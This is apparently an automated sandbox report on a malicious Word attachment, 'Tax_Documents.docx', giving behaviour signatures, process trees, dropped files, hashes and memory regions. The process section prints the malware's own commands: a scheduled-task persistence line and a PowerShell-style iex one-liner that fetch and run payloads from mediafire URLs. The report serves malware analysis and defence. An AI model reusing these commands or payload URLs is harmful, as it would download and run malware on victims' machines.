Analysis

  • max time kernel
    57s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20220331-en
  • submitted
    06-04-2022 17:14

General

  • Target

    Tax_Documents.docx

  • Size

    290KB

  • MD5

    e7bc410788af86fe5e41695dd0ae308b

  • SHA1

    8d9f55c90db961ea66993fd03e148b0dc9bcec5b

  • SHA256

    8056c874a9bc6c2204ab4ea45a6f0ef4f2de0302e367695fdfd3599e4509df55

  • SHA512

    2cd785643c49bd7ec7939e2684d9c4d12168d68df8ad554f2a6fcf9908cbd6fda8bc96d85c5828c8cd6085505a9b4348e031a74d30dc22ba9aee818b4e80d320

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tax_Documents.docx"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1796
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1256
  • C:\Windows\system32\wscript.exe
    wscript C:\Users\Public\update.js
    1⤵
    • Process spawned unexpected child process
    PID:296
  • C:\ProgramData\ddond.com
    C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file
    1⤵
    • Executes dropped EXE
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 92 /tn calsendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/dp7ty5qaghujgmw/0Back.htm/file"""
      2⤵
      • Creates scheduled task(s)
      PID:1108
    • C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2032
    • C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1196
    • C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:948
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:868
  • C:\Windows\system32\wscript.exe
    wscript C:\Users\Public\update.js
    1⤵
    • Process spawned unexpected child process
    PID:992
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:1604
  • C:\Windows\system32\wscript.exe
    wscript C:\Users\Public\update.js
    1⤵
    • Process spawned unexpected child process
    PID:848
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:864
  • C:\Windows\system32\wscript.exe
    wscript C:\Users\Public\update.js
    1⤵
    • Process spawned unexpected child process
    PID:1864
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:1712
  • C:\ProgramData\ESETNONU.com
    C:\ProgramData\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://www.mediafire.com/file/dyhisehpe01yoag/mainMOB.dll/file').GetResponse().GetResponseStream()).ReadToend());
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2028

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\ESETNONU.com

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • C:\ProgramData\ddond.com

    Filesize

    13KB

    MD5

    95828d670cfd3b16ee188168e083c3c5

    SHA1

    83c70c66cd4e971be2e36efdc27fbcb7ff289032

    SHA256

    8c10ae4be93834a4c744f27ca79736d9123ed9b0d180db28556d2d002545baf2

    SHA512

    22be50366cf57fd3507760122ccaa3d74e6a137c2d46377597284d62762bfca740bed71ddc4eca60e4ba81055eb3d1bde34af382a2c4587ba9335d670d7f3b2e

  • C:\ProgramData\ddond.com

    Filesize

    13KB

    MD5

    95828d670cfd3b16ee188168e083c3c5

    SHA1

    83c70c66cd4e971be2e36efdc27fbcb7ff289032

    SHA256

    8c10ae4be93834a4c744f27ca79736d9123ed9b0d180db28556d2d002545baf2

    SHA512

    22be50366cf57fd3507760122ccaa3d74e6a137c2d46377597284d62762bfca740bed71ddc4eca60e4ba81055eb3d1bde34af382a2c4587ba9335d670d7f3b2e

  • C:\Users\Public\update.js

    Filesize

    1KB

    MD5

    b2a6eb01401e4a297b4e97a197af123d

    SHA1

    fb7334316dd8b4eba10121b023e7e35d68a8e6a6

    SHA256

    8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

    SHA512

    b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

  • C:\Users\Public\update.js

    Filesize

    1KB

    MD5

    b2a6eb01401e4a297b4e97a197af123d

    SHA1

    fb7334316dd8b4eba10121b023e7e35d68a8e6a6

    SHA256

    8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

    SHA512

    b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

  • C:\Users\Public\update.js

    Filesize

    1KB

    MD5

    b2a6eb01401e4a297b4e97a197af123d

    SHA1

    fb7334316dd8b4eba10121b023e7e35d68a8e6a6

    SHA256

    8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

    SHA512

    b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

  • C:\Users\Public\update.js

    Filesize

    1KB

    MD5

    b2a6eb01401e4a297b4e97a197af123d

    SHA1

    fb7334316dd8b4eba10121b023e7e35d68a8e6a6

    SHA256

    8b0bf4bb6fc86ad0fb6d4a26f3d963889882ee261b678498c39b01b052df3801

    SHA512

    b12e8858343e59755b4d336e906906631365e88b8da51fc428a0ef07dd011b67be45b4d271a6c7fd5145a8c1d8087b76d2db737ee9eaf65f42965e48ad473ba3

  • \ProgramData\ESETNONU.com

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • \ProgramData\ddond.com

    Filesize

    13KB

    MD5

    95828d670cfd3b16ee188168e083c3c5

    SHA1

    83c70c66cd4e971be2e36efdc27fbcb7ff289032

    SHA256

    8c10ae4be93834a4c744f27ca79736d9123ed9b0d180db28556d2d002545baf2

    SHA512

    22be50366cf57fd3507760122ccaa3d74e6a137c2d46377597284d62762bfca740bed71ddc4eca60e4ba81055eb3d1bde34af382a2c4587ba9335d670d7f3b2e

  • \ProgramData\ddond.com

    Filesize

    13KB

    MD5

    95828d670cfd3b16ee188168e083c3c5

    SHA1

    83c70c66cd4e971be2e36efdc27fbcb7ff289032

    SHA256

    8c10ae4be93834a4c744f27ca79736d9123ed9b0d180db28556d2d002545baf2

    SHA512

    22be50366cf57fd3507760122ccaa3d74e6a137c2d46377597284d62762bfca740bed71ddc4eca60e4ba81055eb3d1bde34af382a2c4587ba9335d670d7f3b2e

  • memory/864-84-0x0000000070E0D000-0x0000000070E18000-memory.dmp

    Filesize

    44KB

  • memory/868-71-0x0000000070E0D000-0x0000000070E18000-memory.dmp

    Filesize

    44KB

  • memory/948-97-0x0000000000000000-mapping.dmp

  • memory/1108-93-0x0000000000000000-mapping.dmp

  • memory/1196-96-0x0000000000000000-mapping.dmp

  • memory/1256-62-0x0000000070E0D000-0x0000000070E18000-memory.dmp

    Filesize

    44KB

  • memory/1256-59-0x000000002F1E1000-0x000000002F1E4000-memory.dmp

    Filesize

    12KB

  • memory/1256-70-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1604-77-0x0000000070E0D000-0x0000000070E18000-memory.dmp

    Filesize

    44KB

  • memory/1712-89-0x0000000070E0D000-0x0000000070E18000-memory.dmp

    Filesize

    44KB

  • memory/1796-54-0x00000000723A1000-0x00000000723A4000-memory.dmp

    Filesize

    12KB

  • memory/1796-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1796-57-0x0000000075D61000-0x0000000075D63000-memory.dmp

    Filesize

    8KB

  • memory/1796-58-0x0000000070E0D000-0x0000000070E18000-memory.dmp

    Filesize

    44KB

  • memory/1796-55-0x000000006FE21000-0x000000006FE23000-memory.dmp

    Filesize

    8KB

  • memory/2028-95-0x000007FEFB801000-0x000007FEFB803000-memory.dmp

    Filesize

    8KB

  • memory/2028-101-0x0000000002362000-0x0000000002364000-memory.dmp

    Filesize

    8KB

  • memory/2028-102-0x0000000002364000-0x0000000002367000-memory.dmp

    Filesize

    12KB

  • memory/2028-100-0x0000000002360000-0x0000000002362000-memory.dmp

    Filesize

    8KB

  • memory/2028-98-0x000007FEED190000-0x000007FEEDCED000-memory.dmp

    Filesize

    11.4MB

  • memory/2028-103-0x000000000236B000-0x000000000238A000-memory.dmp

    Filesize

    124KB

  • memory/2032-94-0x0000000000000000-mapping.dmp